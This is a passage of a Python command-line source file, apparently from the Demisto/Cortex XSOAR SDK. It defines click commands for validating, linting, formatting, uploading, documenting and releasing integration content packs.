#\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\", help=\"The directory path to the files to unify\", required=True, type=click.Path(dir_okay=True)\n)\n@click.option(\n \"-o\", \"--output\", help=\"The output dir to write the unified yml to\", required=False\n)\n@click.option(\n \"--force\", help=\"Forcefully overwrites the preexisting yml if one exists\",\n is_flag=True,\n show_default=False\n)\ndef unify(**kwargs):\n \"\"\"Unify code, image, description and yml files to a single Demisto yml file. Note that\n this should be used on a single integration/script and not a pack\n not multiple scripts/integrations\n \"\"\"\n check_configuration_file('unify', kwargs)\n # Input is of type Path.\n kwargs['input'] = str(kwargs['input'])\n unifier = Unifier(**kwargs)\n unifier.merge_script_package_to_yml()\n return 0\n\n\n# ====================== validate ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '--no-conf-json', is_flag=True,\n default=False, show_default=True, help='Skip conf.json validation')\n@click.option(\n '-s', '--id-set', is_flag=True,\n default=False, show_default=True, help='Perform validations using the id_set file.')\n@click.option(\n \"-idp\", \"--id-set-path\", help=\"The path of the id-set.json used for validations.\",\n type=click.Path(resolve_path=True))\n@click.option(\n '--prev-ver', help='Previous branch or SHA1 commit to run checks against.')\n@click.option(\n '--no-backward-comp', is_flag=True, show_default=True,\n help='Whether to check backward compatibility or not.')\n@click.option(\n '-g', '--use-git', is_flag=True, show_default=True,\n default=False,\n help='Validate changes using git - this will check current branch\\'s changes against origin/master. '\n 'If the --post-commit flag is supplied: validation will run only on the current branch\\'s changed files '\n 'that have been committed. '\n 'If the --post-commit flag is not supplied: validation will run on all changed files in the current branch, '\n 'both committed and not committed. ')\n@click.option(\n '--post-commit',\n is_flag=True,\n help='Whether the validation should run only on the current branch\\'s committed changed files. '\n 'This applies only when the -g flag is supplied.'\n)\n@click.option(\n '--staged',\n is_flag=True,\n help='Whether the validation should ignore unstaged files.'\n 'This applies only when the -g flag is supplied.'\n)\n@click.option(\n '-iu', '--include-untracked',\n is_flag=True,\n help='Whether to include untracked files in the validation.'\n)\n@click.option(\n '-a', '--validate-all', is_flag=True, show_default=True, default=False,\n help='Whether to run all validation on all files or not.'\n)\n@click.option(\n '-i', '--input', type=click.Path(exists=True, resolve_path=True),\n help='The path of the content pack/file to validate specifically.'\n)\n@click.option(\n '--skip-pack-release-notes', is_flag=True,\n help='Skip validation of pack release notes.')\n@click.option(\n '--print-ignored-errors', is_flag=True,\n help='Print ignored errors as warnings.')\n@click.option(\n '--print-ignored-files', is_flag=True,\n help='Print which files were ignored by the command.')\n@click.option(\n '--no-docker-checks', is_flag=True,\n help='Whether to run docker image validation.')\n@click.option(\n '--silence-init-prints', is_flag=True,\n help='Whether to skip the initialization prints.')\n@click.option(\n '--skip-pack-dependencies', is_flag=True,\n help='Skip validation of pack dependencies.')\n@click.option(\n '--create-id-set', is_flag=True,\n help='Whether to create the id_set.json file.')\n@click.option(\n '-j', '--json-file', help='The JSON file path to which to output the command results.')\n@click.option(\n '--skip-schema-check', is_flag=True,\n help='Whether to skip the file schema check.')\n@click.option(\n '--debug-git', is_flag=True,\n help='Whether to print debug logs for git statuses.')\n@click.option(\n '--print-pykwalify', is_flag=True,\n help='Whether to print the pykwalify log errors.')\n@click.option(\n \"--quite-bc-validation\",\n help=\"Set backwards compatibility validation's errors as warnings\",\n is_flag=True)\n@pass_config\ndef validate(config, **kwargs):\n \"\"\"Validate your content files. If no additional flags are given, will validated only committed files.\"\"\"\n check_configuration_file('validate', kwargs)\n sys.path.append(config.configuration.env_dir)\n\n file_path = kwargs['input']\n\n if kwargs['post_commit'] and kwargs['staged']:\n print_error('Could not supply the staged flag with the post-commit flag')\n sys.exit(1)\n try:\n is_external_repo = tools.is_external_repository()\n # default validate to -g --post-commit\n if not kwargs.get('validate_all') and not kwargs['use_git'] and not file_path:\n kwargs['use_git'] = True\n kwargs['post_commit'] = True\n validator = ValidateManager(\n is_backward_check=not kwargs['no_backward_comp'],\n only_committed_files=kwargs['post_commit'], prev_ver=kwargs['prev_ver'],\n skip_conf_json=kwargs['no_conf_json'], use_git=kwargs['use_git'],\n file_path=file_path,\n validate_all=kwargs.get('validate_all'),\n validate_id_set=kwargs['id_set'],\n skip_pack_rn_validation=kwargs['skip_pack_release_notes'],\n print_ignored_errors=kwargs['print_ignored_errors'],\n is_external_repo=is_external_repo,\n print_ignored_files=kwargs['print_ignored_files'],\n no_docker_checks=kwargs['no_docker_checks'],\n silence_init_prints=kwargs['silence_init_prints'],\n skip_dependencies=kwargs['skip_pack_dependencies'],\n id_set_path=kwargs.get('id_set_path'),\n staged=kwargs['staged'],\n create_id_set=kwargs.get('create_id_set'),\n json_file_path=kwargs.get('json_file'),\n skip_schema_check=kwargs.get('skip_schema_check'),\n debug_git=kwargs.get('debug_git'),\n include_untracked=kwargs.get('include_untracked'),\n quite_bc=kwargs.get('quite_bc_validation')\n )\n return validator.run_validation()\n except (git.InvalidGitRepositoryError, git.NoSuchPathError, FileNotFoundError) as e:\n print_error(e)\n print_error(\"\\nYou may not be running `demisto-sdk validate` command in the content directory.\\n\"\n \"Please run the command from content directory\")\n sys.exit(1)\n\n\n# ====================== create-content-artifacts ====================== #\n@main.command(hidden=True)\n@click.help_option(\n '-h', '--help'\n)\n@click.option('-a', '--artifacts_path', help='Destination directory to create the artifacts.',\n type=click.Path(file_okay=False, resolve_path=True), required=True)\n@click.option('--zip/--no-zip', help='Zip content artifacts folders', default=True)\n@click.option('--packs', help='Create only content_packs artifacts.', is_flag=True)\n@click.option('-v', '--content_version', help='The content version in CommonServerPython.', default='0.0.0')\n@click.option('-s', '--suffix', help='Suffix to add all yaml/json/yml files in the created artifacts.')\n@click.option('--cpus',\n help='Number of cpus/vcpus available - only required when os not reflect number of cpus (CircleCI'\n 'always show 32, but medium has 3.', hidden=True, default=os.cpu_count())\n@click.option('-idp', '--id-set-path', help='The full path of id_set.json', hidden=True,\n type=click.Path(exists=True, resolve_path=True))\n@click.option('-p', '--pack-names',\n help=(\"Packs to create artifacts for. Optional values are: `all` or \"\n \"csv list of packs. \"\n \"Default is set to `all`\"),\n default=\"all\", hidden=True)\n@click.option('-sk', '--signature-key', help='Base64 encoded signature key used for signing packs.', hidden=True)\n@click.option('-sd', '--sign-directory', help='Path to the signDirectory executable file.',\n type=click.Path(exists=True, resolve_path=True), hidden=True)\n@click.option('-rt', '--remove-test-playbooks', is_flag=True,\n help='Should remove test playbooks from content packs or not.', default=True, hidden=True)\ndef create_content_artifacts(**kwargs) -> int:\n \"\"\"Generating the following artifacts:\n 1. content_new - Contains all content objects of type json,yaml (from_version < 6.0.0)\n 2. content_packs - Contains all packs from Packs - Ignoring internal files (to_version >= 6.0.0).\n 3. content_test - Contains all test scripts/playbooks (from_version < 6.0.0)\n 4. content_all - Contains all from content_new and content_test.\n 5. uploadable_packs - Contains zipped packs that are ready to be uploaded to Cortex XSOAR machine.\n \"\"\"\n logging_setup(3)\n check_configuration_file('create-content-artifacts', kwargs)\n artifacts_conf = ArtifactsManager(**kwargs)\n return artifacts_conf.create_content_artifacts()\n\n\n# ====================== secrets ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input', help='Specify file of to check secret on.'\n)\n@click.option(\n '--post-commit',\n is_flag=True,\n show_default=True,\n help='Whether the secretes is done after you committed your files, '\n 'this will help the command to determine which files it should check in its '\n 'run. Before you commit the files it should not be used. Mostly for build '\n 'validations.'\n)\n@click.option(\n '-ie', '--ignore-entropy',\n is_flag=True,\n help='Ignore entropy algorithm that finds secret strings (passwords/api keys)'\n)\n@click.option(\n '-wl', '--whitelist',\n default='./Tests/secrets_white_list.json',\n show_default=True,\n help='Full path to whitelist file, file name should be \"secrets_white_list.json\"'\n)\n@click.option(\n '--prev-ver',\n help='The branch against which to run secrets validation'\n)\n@pass_config\ndef secrets(config, **kwargs):\n \"\"\"Run Secrets validator to catch sensitive data before exposing your code to public repository.\n Attach path to whitelist to allow manual whitelists.\n \"\"\"\n check_configuration_file('secrets', kwargs)\n sys.path.append(config.configuration.env_dir)\n secrets_validator = SecretsValidator(\n configuration=config.configuration,\n is_circle=kwargs['post_commit'],\n ignore_entropy=kwargs['ignore_entropy'],\n white_list_path=kwargs['whitelist'],\n input_path=kwargs.get('input')\n )\n return secrets_validator.run()\n\n\n# ====================== lint ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\", help=\"Specify directory(s) of integration/script\",\n type=PathsParamType(exists=True, resolve_path=True)\n)\n@click.option(\"-g\", \"--git\", is_flag=True, help=\"Will run only on changed packages\")\n@click.option(\"-a\", \"--all-packs\", is_flag=True, help=\"Run lint on all directories in content repo\")\n@click.option('-v', \"--verbose\", count=True, help=\"Verbosity level -v / -vv / .. / -vvv\",\n type=click.IntRange(0, 3, clamp=True), default=2, show_default=True)\n@click.option('-q', \"--quiet\", is_flag=True, help=\"Quiet output, only output results in the end\")\n@click.option(\"-p\", \"--parallel\", default=1, help=\"Run tests in parallel\", type=click.IntRange(0, 15, clamp=True),\n show_default=True)\n@click.option(\"--no-flake8\", is_flag=True, help=\"Do NOT run flake8 linter\")\n@click.option(\"--no-bandit\", is_flag=True, help=\"Do NOT run bandit linter\")\n@click.option(\"--no-xsoar-linter\", is_flag=True, help=\"Do NOT run XSOAR linter\")\n@click.option(\"--no-mypy\", is_flag=True, help=\"Do NOT run mypy static type checking\")\n@click.option(\"--no-vulture\", is_flag=True, help=\"Do NOT run vulture linter\")\n@click.option(\"--no-pylint\", is_flag=True, help=\"Do NOT run pylint linter\")\n@click.option(\"--no-test\", is_flag=True, help=\"Do NOT test (skip pytest)\")\n@click.option(\"--no-pwsh-analyze\", is_flag=True, help=\"Do NOT run powershell analyze\")\n@click.option(\"--no-pwsh-test\", is_flag=True, help=\"Do NOT run powershell test\")\n@click.option(\"-kc\", \"--keep-container\", is_flag=True, help=\"Keep the test container\")\n@click.option(\"--prev-ver\", default='master', help=\"Previous branch or SHA1 commit to run checks against\")\n@click.option(\"--test-xml\", help=\"Path to store pytest xml results\", type=click.Path(exists=True, resolve_path=True))\n@click.option(\"--failure-report\", help=\"Path to store failed packs report\",\n type=click.Path(exists=True, resolve_path=True))\n@click.option(\"-lp\", \"--log-path\", help=\"Path to store all levels of logs\",\n type=click.Path(resolve_path=True))\n@click.option(\"-j\", \"--json-file\", help=\"The JSON file path to which to output the command results.\",\n type=click.Path(resolve_path=True))\ndef lint(**kwargs):\n \"\"\"Lint command will perform:\n 1. Package in host checks - flake8, bandit, mypy, vulture.\n 2. Package in docker image checks - pylint, pytest, powershell - test, powershell - analyze.\n Meant to be used with integrations/scripts that use the folder (package) structure.\n Will lookup up what docker image to use and will setup the dev dependencies and file in the target folder.\n If no additional flags specifying the packs are given,will lint only changed files.\n \"\"\"\n logging_setup(verbose=kwargs.get('verbose'), # type: ignore[arg-type]\n quiet=kwargs.get('quiet'), # type: ignore[arg-type]\n log_path=kwargs.get('log_path')) # type: ignore[arg-type]\n\n check_configuration_file('lint', kwargs)\n lint_manager = LintManager(\n input=kwargs.get('input'), # type: ignore[arg-type]\n git=kwargs.get('git'), # type: ignore[arg-type]\n all_packs=kwargs.get('all_packs'), # type: ignore[arg-type]\n verbose=kwargs.get('verbose'), # type: ignore[arg-type]\n quiet=kwargs.get('quiet'), # type: ignore[arg-type]\n prev_ver=kwargs.get('prev_ver'), # type: ignore[arg-type]\n json_file_path=kwargs.get('json_file') # type: ignore[arg-type]\n )\n return lint_manager.run_dev_packages(\n parallel=kwargs.get('parallel'), # type: ignore[arg-type]\n no_flake8=kwargs.get('no_flake8'), # type: ignore[arg-type]\n no_bandit=kwargs.get('no_bandit'), # type: ignore[arg-type]\n no_mypy=kwargs.get('no_mypy'), # type: ignore[arg-type]\n no_vulture=kwargs.get('no_vulture'), # type: ignore[arg-type]\n no_xsoar_linter=kwargs.get('no_xsoar_linter'), # type: ignore[arg-type]\n no_pylint=kwargs.get('no_pylint'), # type: ignore[arg-type]\n no_test=kwargs.get('no_test'), # type: ignore[arg-type]\n no_pwsh_analyze=kwargs.get('no_pwsh_analyze'), # type: ignore[arg-type]\n no_pwsh_test=kwargs.get('no_pwsh_test'), # type: ignore[arg-type]\n keep_container=kwargs.get('keep_container'), # type: ignore[arg-type]\n test_xml=kwargs.get('test_xml'), # type: ignore[arg-type]\n failure_report=kwargs.get('failure_report') # type: ignore[arg-type]\n )\n\n\n# ====================== format ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\", help=\"The path of the script yml file\\n\"\n \"If no input is specified, the format will be executed on all new/changed files.\",\n type=click.Path(exists=True, resolve_path=True))\n@click.option(\n \"-o\", \"--output\", help=\"The path where the formatted file will be saved to\",\n type=click.Path(resolve_path=True))\n@click.option(\n \"-fv\", \"--from-version\", help=\"Specify fromversion of the pack\")\n@click.option(\n \"-nv\", \"--no-validate\", help=\"Set when validate on file is not wanted\", is_flag=True)\n@click.option(\n \"-ud\", \"--update-docker\", help=\"Set if you want to update the docker image of the integration/script\", is_flag=True)\n@click.option(\n \"-v\", \"--verbose\", help=\"Verbose output\", is_flag=True)\n@click.option(\n \"-y\", \"--assume-yes\",\n help=\"Automatic yes to prompts; assume 'yes' as answer to all prompts and run non-interactively\",\n is_flag=True)\ndef format(\n input: Path,\n output: Path,\n from_version: str,\n no_validate: bool,\n update_docker: bool,\n verbose: bool,\n assume_yes: bool\n):\n \"\"\"Run formatter on a given script/playbook/integration/incidentfield/indicatorfield/\n incidenttype/indicatortype/layout/dashboard/classifier/mapper/widget/report file.\n \"\"\"\n return format_manager(\n str(input) if input else None,\n str(output) if output else None,\n from_version=from_version,\n no_validate=no_validate,\n update_docker=update_docker,\n assume_yes=assume_yes,\n verbose=verbose\n )\n\n\n# ====================== upload ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\",\n help=\"The path of file or a directory to upload. The following are supported:\\n\"\n \"- Pack\\n\"\n \"- A content entity directory that is inside a pack. For example: an Integrations \"\n \"directory or a Layouts directory.\\n\"\n \"- Valid file that can be imported to Cortex XSOAR manually. For example a playbook: \"\n \"helloWorld.yml\", required=True\n)\n@click.option(\n \"--insecure\",\n help=\"Skip certificate validation\", is_flag=True\n)\n@click.option(\n \"-v\", \"--verbose\",\n help=\"Verbose output\", is_flag=True\n)\ndef upload(**kwargs):\n \"\"\"Upload integration to Demisto instance.\n DEMISTO_BASE_URL environment variable should contain the Demisto server base URL.\n DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n * Note: Uploading classifiers to Cortex XSOAR is available from version 6.0.0 and up. *\n \"\"\"\n check_configuration_file('upload', kwargs)\n uploader = Uploader(**kwargs)\n return uploader.upload()\n\n\n# ====================== download ====================== #\n\n\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-o\", \"--output\", help=\"The path of a package directory to download custom content to\", required=False,\n multiple=False)\n@click.option(\n \"-i\", \"--input\", help=\"Custom content file name to be downloaded. Can be provided multiple times\",\n required=False, multiple=True)\n@click.option(\n \"--insecure\", help=\"Skip certificate validation\", is_flag=True)\n@click.option(\n \"-v\", \"--verbose\", help=\"Verbose output\", is_flag=True)\n@click.option(\n \"-f\", \"--force\", help=\"Whether to override existing files or not\", is_flag=True)\n@click.option(\n \"-lf\", \"--list-files\", help=\"Prints a list of all custom content files available to be downloaded\", is_flag=True)\n@click.option(\n \"-a\", \"--all-custom-content\", help=\"Download all available custom content files\", is_flag=True)\n@click.option(\n \"-fmt\", \"--run-format\", help=\"Whether to run demisto-sdk format on downloaded files or not\", is_flag=True)\ndef download(**kwargs):\n \"\"\"Download custom content from Demisto instance.\n DEMISTO_BASE_URL environment variable should contain the Demisto server base URL.\n DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n \"\"\"\n check_configuration_file('download', kwargs)\n downloader: Downloader = Downloader(**kwargs)\n return downloader.download()\n\n\n# ====================== run ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-q\", \"--query\", help=\"The query to run\", required=True)\n@click.option(\n \"--insecure\", help=\"Skip certificate validation\", is_flag=True)\n@click.option(\n \"-v\", \"--verbose\", help=\"Verbose output\", is_flag=True)\n@click.option(\n \"-D\", \"--debug\", help=\"Whether to enable the debug-mode feature or not, if you want to save the output file \"\n \"please use the --debug-path option\", is_flag=True)\n@click.option(\n \"--debug-path\", help=\"The path to save the debug file at, if not specified the debug file will be printed to the \"\n \"terminal\")\n@click.option(\n \"--json-to-outputs\", help=\"Whether to run json_to_outputs command on the context output of the query. If the \"\n \"context output does not exists or the `-r` flag is used, will use the raw\"\n \" response of the query\", is_flag=True)\n@click.option(\n \"-p\", \"--prefix\", help=\"Used with `json-to-outputs` flag. Output prefix e.g. Jira.Ticket, VirusTotal.IP, \"\n \"the base path for the outputs that the script generates\")\n@click.option(\n \"-r\", \"--raw-response\", help=\"Used with `json-to-outputs` flag. Use the raw response of the query for\"\n \" `json-to-outputs`\", is_flag=True)\ndef run(**kwargs):\n \"\"\"Run integration command on remote Demisto instance in the playground.\n DEMISTO_BASE_URL environment variable should contain the Demisto base URL.\n DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n \"\"\"\n check_configuration_file('run', kwargs)\n runner = Runner(**kwargs)\n return runner.run()\n\n\n# ====================== run-playbook ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '--url', '-u',\n help='URL to a Demisto instance. You can also specify the URL as an environment variable named: DEMISTO_BASE_URL'\n)\n@click.option(\n '--playbook_id', '-p',\n help=\"The playbook ID to run.\",\n required=True\n)\n@click.option(\n '--wait', '-w', is_flag=True,\n help=\"Wait until the playbook run is finished and get a response.\"\n)\n@click.option(\n '--timeout', '-t',\n default=90,\n show_default=True,\n help=\"Timeout for the command. The playbook will continue to run in Demisto\"\n)\n@click.option(\n \"--insecure\", help=\"Skip certificate validation\", is_flag=True)\ndef run_playbook(**kwargs):\n \"\"\"Run a playbook in Demisto.\n DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n Example: DEMISTO_API_KEY= demisto-sdk run-playbook -p 'p_name' -u\n 'https://demisto.local'.\n \"\"\"\n check_configuration_file('run-playbook', kwargs)\n playbook_runner = PlaybookRunner(**kwargs)\n return playbook_runner.run_playbook()\n\n\n# ====================== json-to-outputs ====================== #\n@main.command('json-to-outputs') # To no shadow json_to_outputs import\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-c\", \"--command\", help=\"Command name (e.g. xdr-get-incidents)\", required=True)\n@click.option(\n \"-i\", \"--input\",\n help=\"Valid JSON file path. If not specified, the script will wait for user input in the terminal. \"\n \"The response can be obtained by running the command with `raw-response=true` argument.\",\n required=False)\n@click.option(\n \"-p\", \"--prefix\", help=\"Output prefix like Jira.Ticket, VirusTotal.IP, the base path for the outputs that the \"\n \"script generates\", required=True)\n@click.option(\n \"-o\", \"--output\", help=\"Output file path, if not specified then will print to stdout\", required=False)\n@click.option(\n \"-v\", \"--verbose\", is_flag=True, help=\"Verbose output - mainly for debugging purposes\")\n@click.option(\n \"--interactive\", help=\"If passed, then for each output field will ask user interactively to enter the \"\n \"description. By default is interactive mode is disabled\", is_flag=True)\ndef json_to_outputs_command(**kwargs):\n \"\"\"Demisto integrations/scripts have a YAML file that defines them.\n Creating the YAML file is a tedious and error-prone task of manually copying outputs from the API result to the\n file/UI/PyCharm. This script auto generates the YAML for a command from the JSON result of the relevant API call\n \"\"\"\n check_configuration_file('json-to-outputs', kwargs)\n json_to_outputs(**kwargs)\n\n\n# ====================== generate-test-playbook ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n required=True,\n help='Specify integration/script yml path')\n@click.option(\n '-o', '--output',\n required=False,\n help='Specify output directory')\n@click.option(\n '-n', '--name',\n required=True,\n help='Specify test playbook name')\n@click.option(\n '--no-outputs', is_flag=True,\n help='Skip generating verification conditions for each output contextPath. Use when you want to decide which '\n 'outputs to verify and which not')\n@click.option(\n \"-v\", \"--verbose\", help=\"Verbose output for debug purposes - shows full exception stack trace\", is_flag=True)\ndef generate_test_playbook(**kwargs):\n \"\"\"Generate test playbook from integration or script\"\"\"\n check_configuration_file('generate-test-playbook', kwargs)\n file_type: FileType = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n if file_type not in [FileType.INTEGRATION, FileType.SCRIPT]:\n print_error('Generating test playbook is possible only for an Integration or a Script.')\n return 1\n generator = PlaybookTestsGenerator(file_type=file_type.value, **kwargs)\n generator.run()\n\n\n# ====================== init ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-n\", \"--name\", help=\"The name of the directory and file you want to create\", required=True)\n@click.option(\n \"--id\", help=\"The id used in the yml file of the integration or script\"\n)\n@click.option(\n \"-o\", \"--output\", help=\"The output dir to write the object into. The default one is the current working \"\n \"directory.\")\n@click.option(\n '--integration', is_flag=True, help=\"Create an Integration based on BaseIntegration template\")\n@click.option(\n '--script', is_flag=True, help=\"Create a Script based on BaseScript example\")\n@click.option(\n \"--pack\", is_flag=True, help=\"Create pack and its sub directories\")\n@click.option(\n \"-t\", \"--template\", help=\"Create an Integration/Script based on a specific template.\\n\"\n \"Integration template options: HelloWorld, HelloIAMWorld, FeedHelloWorld.\\n\"\n \"Script template options: HelloWorldScript\")\n@click.option(\n '--demisto_mock', is_flag=True,\n help=\"Copy the demistomock. Relevant for initialization of Scripts and Integrations within a Pack.\")\n@click.option(\n '--common_server', is_flag=True,\n help=\"Copy the CommonServerPython. Relevant for initialization of Scripts and Integrations within a Pack.\")\ndef init(**kwargs):\n \"\"\"Initialize a new Pack, Integration or Script.\n If the script/integration flags are not present, we will create a pack with the given name.\n Otherwise when using the flags we will generate a script/integration based on your selection.\n \"\"\"\n check_configuration_file('init', kwargs)\n initiator = Initiator(**kwargs)\n initiator.init()\n return 0\n\n\n# ====================== generate-docs ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\", help=\"Path of the yml file.\", required=True)\n@click.option(\n \"-o\", \"--output\", help=\"The output dir to write the documentation file into,\"\n \" documentation file name is README.md. If not specified, will be in the yml dir.\",\n required=False)\n@click.option(\n \"-uc\", \"--use_cases\", help=\"For integration - Top use-cases. Number the steps by '*' (i.e. '* foo. * bar.')\",\n required=False)\n@click.option(\n \"-c\", \"--command\", help=\"A comma-separated command names to generate doc for, will ignore the rest of the commands.\"\n \"e.g (xdr-get-incidents,xdr-update-incident\",\n required=False\n)\n@click.option(\n \"-e\", \"--examples\", help=\"Integrations: path for file containing command examples.\"\n \" Each command should be in a separate line.\"\n \" Scripts: the script example surrounded by quotes.\"\n \" For example: -e '!ConvertFile entry_id='\")\n@click.option(\n \"-p\", \"--permissions\", type=click.Choice([\"none\", \"general\", \"per-command\"]), help=\"Permissions needed.\",\n required=True, default='none')\n@click.option(\n \"-cp\", \"--command_permissions\", help=\"Path for file containing commands permissions\"\n \" Each command permissions should be in a separate line.\"\n \" (i.e. ' Administrator READ-WRITE')\", required=False)\n@click.option(\n \"-l\", \"--limitations\", help=\"Known limitations. Number the steps by '*' (i.e. '* foo. * bar.')\", required=False)\n@click.option(\n \"--insecure\", help=\"Skip certificate validation to run the commands in order to generate the docs.\",\n is_flag=True)\n@click.option(\n \"-v\", \"--verbose\", is_flag=True, help=\"Verbose output - mainly for debugging purposes.\")\ndef generate_docs(**kwargs):\n \"\"\"Generate documentation for integration, playbook or script from yaml file.\"\"\"\n check_configuration_file('generate-docs', kwargs)\n input_path: str = kwargs.get('input', '')\n output_path = kwargs.get('output')\n command = kwargs.get('command')\n examples = str(kwargs.get('examples', ''))\n permissions = kwargs.get('permissions')\n limitations = kwargs.get('limitations')\n insecure: bool = kwargs.get('insecure', False)\n verbose: bool = kwargs.get('verbose', False)\n\n # validate inputs\n if input_path and not os.path.isfile(input_path):\n print_error(F'Input file {input_path} was not found.')\n return 1\n\n if not input_path.lower().endswith('.yml'):\n print_error(F'Input {input_path} is not a valid yml file.')\n return 1\n\n if output_path and not os.path.isdir(output_path):\n print_error(F'Output directory {output_path} was not found.')\n return 1\n\n if command:\n if output_path and (not os.path.isfile(os.path.join(output_path, \"README.md\"))) \\\n or (not output_path) \\\n and (not os.path.isfile(os.path.join(os.path.dirname(os.path.realpath(input_path)), \"README.md\"))):\n print_error(\"The `command` argument must be presented with existing `README.md` docs.\")\n return 1\n\n file_type = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n if file_type not in [FileType.INTEGRATION, FileType.SCRIPT, FileType.PLAYBOOK]:\n print_error('File is not an Integration, Script or a Playbook.')\n return 1\n\n print(f'Start generating {file_type.value} documentation...')\n if file_type == FileType.INTEGRATION:\n use_cases = kwargs.get('use_cases')\n command_permissions = kwargs.get('command_permissions')\n return generate_integration_doc(input_path=input_path, output=output_path, use_cases=use_cases,\n examples=examples, permissions=permissions,\n command_permissions=command_permissions, limitations=limitations,\n insecure=insecure, verbose=verbose, command=command)\n elif file_type == FileType.SCRIPT:\n return generate_script_doc(input_path=input_path, output=output_path, examples=examples,\n permissions=permissions,\n limitations=limitations, insecure=insecure, verbose=verbose)\n elif file_type == FileType.PLAYBOOK:\n return generate_playbook_doc(input_path=input_path, output=output_path, permissions=permissions,\n limitations=limitations, verbose=verbose)\n else:\n print_error(f'File type {file_type.value} is not supported.')\n return 1\n\n\n# ====================== create-id-set ====================== #\n@main.command(hidden=True)\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n help='Input file path, the default is the content repo.',\n default=''\n)\n@click.option(\n \"-o\", \"--output\",\n help=\"Output file path, the default is the Tests directory.\",\n default=''\n)\ndef create_id_set(**kwargs):\n \"\"\"Create the content dependency tree by ids.\"\"\"\n check_configuration_file('create-id-set', kwargs)\n id_set_creator = IDSetCreator(**kwargs)\n id_set_creator.create_id_set()\n\n\n# ====================== merge-id-sets ====================== #\n@main.command(hidden=True)\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i1', '--id-set1',\n help='First id_set.json file path',\n required=True\n)\n@click.option(\n '-i2', '--id-set2',\n help='Second id_set.json file path',\n required=True\n)\n@click.option(\n '-o', '--output',\n help='File path of the united id_set',\n required=True\n)\ndef merge_id_sets(**kwargs):\n \"\"\"Merge two id_sets\"\"\"\n check_configuration_file('merge-id-sets', kwargs)\n first = kwargs['id_set1']\n second = kwargs['id_set2']\n output = kwargs['output']\n\n _, duplicates = merge_id_sets_from_files(\n first_id_set_path=first,\n second_id_set_path=second,\n output_id_set_path=output\n )\n if duplicates:\n print_error(f'Failed to merge ID sets: {first} with {second}, '\n f'there are entities with ID: {duplicates} that exist in both ID sets')\n sys.exit(1)\n\n\n# ====================== update-release-notes =================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\", help=\"The relative path of the content pack. For example Packs/Pack_Name\"\n)\n@click.option(\n '-u', '--update_type', help=\"The type of update being done. [major, minor, revision, maintenance, documentation]\",\n type=click.Choice(['major', 'minor', 'revision', 'maintenance', 'documentation'])\n)\n@click.option(\n '-v', '--version', help=\"Bump to a specific version.\"\n)\n@click.option(\n '--all', help=\"Update all changed packs\", is_flag=True\n)\n@click.option(\n '--text', help=\"Text to add to all of the release notes files\",\n)\n@click.option(\n '--prev-ver', help='Previous branch or SHA1 commit to run checks against.'\n)\n@click.option(\n \"--pre_release\", help=\"Indicates that this change should be designated a pre-release version.\",\n is_flag=True)\n@click.option(\n \"-idp\", \"--id-set-path\", help=\"The path of the id-set.json used for APIModule updates.\",\n type=click.Path(resolve_path=True))\ndef update_release_notes(**kwargs):\n \"\"\"Auto-increment pack version and generate release notes template.\"\"\"\n check_configuration_file('update-release-notes', kwargs)\n _pack = kwargs.get('input')\n update_type = kwargs.get('update_type')\n pre_release: bool = kwargs.get('pre_release', False)\n is_all = kwargs.get('all')\n text: str = kwargs.get('text', '')\n specific_version = kwargs.get('version')\n id_set_path = kwargs.get('id_set_path')\n prev_ver = kwargs.get('prev_ver')\n existing_rn_version = ''\n # _pack can be both path or pack name thus, we extract the pack name from the path if beeded.\n if _pack and is_all:\n print_error(\"Please remove the --all flag when specifying only one pack.\")\n sys.exit(0)\n print(\"Starting to update release notes.\")\n if _pack and '/' in _pack:\n _pack = get_pack_name(_pack)\n try:\n validate_manager = ValidateManager(skip_pack_rn_validation=True, prev_ver=prev_ver, silence_init_prints=True)\n validate_manager.setup_git_params()\n modified, added, changed_meta_files, old = validate_manager.get_changed_files_from_git()\n _packs = get_packs(modified).union(get_packs(old)).union(\n get_packs(added))\n except (git.InvalidGitRepositoryError, git.NoSuchPathError, FileNotFoundError):\n print_error(\"You are not running `demisto-sdk update-release-notes` command in the content repository.\\n\"\n \"Please run `cd content` from your terminal and run the command again\")\n sys.exit(1)\n\n packs_existing_rn = {}\n for file_path in added:\n if 'ReleaseNotes' in file_path:\n packs_existing_rn[get_pack_name(file_path)] = file_path\n\n filtered_modified = filter_files_by_type(modified, skip_file_types=SKIP_RELEASE_NOTES_FOR_TYPES)\n filtered_added = filter_files_by_type(added, skip_file_types=SKIP_RELEASE_NOTES_FOR_TYPES)\n\n if _pack and API_MODULES_PACK in _pack:\n # case: ApiModules\n update_api_modules_dependents_rn(_pack, pre_release, update_type, added, modified,\n id_set_path=id_set_path, text=text)\n\n # create release notes:\n if _pack:\n _packs = {_pack}\n elif not is_all and len(_packs) > 1:\n # case: multiple packs\n pack_list = ' ,'.join(_packs)\n print_error(f\"Detected changes in the following packs: {pack_list.rstrip(', ')}\\n\"\n f\"To update release notes in a specific pack, please use the -i parameter 